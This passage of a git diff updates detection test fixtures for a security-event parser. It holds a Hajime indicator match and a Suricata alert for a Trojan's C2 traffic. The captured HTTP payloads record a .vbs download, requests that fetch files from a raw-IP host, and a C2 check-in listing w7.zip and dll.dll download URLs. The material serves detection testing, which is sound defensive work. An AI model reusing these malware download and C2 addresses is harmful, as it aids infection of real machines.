trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "module": "retrohunt",
+      "severity": 1
+    },
+    "@timestamp": "2023-06-12T10:12:39.001000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "ip": "2.2.2.2",
+      "port": 80
+    },
+    "gatewatcher": {
+      "campaigns": [],
+      "case_id": "00100035-1206-2023-edb6-b38911f8ba0c",
+      "categories": [
+        "malware"
+      ],
+      "description": "IOC matching first tests",
+      "event_type": "retrohunt",
+      "external_links": [
+        "{\"source_name\": \"URLHaus Abuse.ch\", \"url\": \"https://urlhaus.abuse.ch/url/2269068/\"}"
+      ],
+      "families": [
+        "Hajime"
+      ],
+      "flow_id": "841376349480333",
+      "gcap": "gcap-xxxxxxxxxxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxxxxxxxxxxx.domain.local",
+      "ioc_creation_date": "2023-06-12T10:00:35+00:00",
+      "ioc_id": "00100035-1206-2023-cbf5-08330f0d5bc0",
+      "ioc_tags": [
+        "backdoor.hajime.linux.129",
+        "e32/agent.cd",
+        "elf.mirai.43048.gc",
+        "hajime",
+        "linux.hajime.bc",
+        "linux/hajime.75930",
+        "linux/hajime.a trojan",
+        "linux/hajime.nsnlw",
+        "trojan.elfarm32.hajime.fbhtfi",
+        "trojan.generickd.34055387",
+        "trojan.generickd.34055387 (b)",
+        "trojan.linux.hajime",
+        "unix.malware.agent-6626471-0"
+      ],
+      "ioc_type": "Host",
+      "ioc_updated_date": "2023-06-12T10:00:35+00:00",
+      "ioc_value": "im.a.very.bad.doma.in",
+      "kill_chain_phases": [],
+      "matched_event": "bd7686c8-20db-427e-941d-844a5ecfe559",
+      "matched_event_type": "alert",
+      "meta_data": "{\"cwe\": [], \"descriptions\": [], \"filetype\": \"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\", \"size\": 78.3984375, \"ssdeep\": \"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\", \"tslh\": \"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\", \"usageMode\": \"hunting\"}",
+      "probability": 0.5,
+      "relations": [
+        "0e3cc27b-7999-48ce-8484-dc12b325a355"
+      ],
+      "risk": "Suspicious",
+      "signature": "RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0",
+      "targeted_countries": [],
+      "targeted_organizations": [],
+      "targeted_platforms": [
+        "linux"
+      ],
+      "targeted_sectors": [],
+      "threat_actor": [
+        "GW Lab Test"
+      ],
+      "timestamp_analyzed": "2023-06-12T10:12:39.001Z",
+      "timestamp_detected": "2023-06-09T14:08:46.845Z",
+      "timestamp_package": "2023-06-12T10:00:35.012874+0000",
+      "tlp": "green",
+      "ttp": [],
+      "type": "cti",
+      "usage_mode": "hunting",
+      "vulnerabilities": []
+    },
+    "observer": {
+      "name": "gcap-xxxxxxxxxxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 55614
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index 576a3a270..bbbc667e0 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -9,6 +9,81 @@
     "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}"
   },
   "expected": {
-    "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}"
+    "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUy